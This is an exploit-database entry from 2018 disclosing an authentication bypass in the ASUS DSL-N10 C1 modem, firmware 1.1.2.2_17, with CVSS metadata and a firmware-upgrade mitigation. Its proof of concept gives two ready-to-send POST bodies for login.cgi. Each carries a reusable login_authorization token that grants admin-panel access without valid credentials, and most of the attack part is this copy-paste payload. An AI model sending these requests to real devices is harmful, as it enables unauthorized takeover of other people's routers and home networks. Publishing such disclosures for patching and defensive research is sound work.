ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass

vendor:

DSL N10 C1

by:

AmnBAN team

8.8

CVSS

HIGH

Authentication Bypass

N/A

CWE

Product Name: DSL N10 C1

Affected Version From: 1.1.2.2_17

Affected Version To: 1.1.2.2_17

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

ASUS-DSL N10 1.1.2.2_17 – Authentication Bypass

In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization parameter in post data, that use for authorization access to admin panel, the data of this parameter is not fully random and you can use old data or data of another device to access admin panel.

Mitigation:

Upgrade to the latest version of the firmware.

Source

Exploit-DB raw data:

# Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
# Author: AmnBAN team
# Date: 2018-08-06
# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
# Sofrware version: 1.1.2.2_17
# CVE: N/A

# 1. Description:
# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization 
# parameter in post data, that use for authorization access to admin panel, 
# the data of this parameter is not fully random and you can use old data 
# or data of another device to access admin panel.

# 2. Proof of Concept:
# Browse http://<Your Modem IP>/login.cgi

# Send this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D

# Or this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D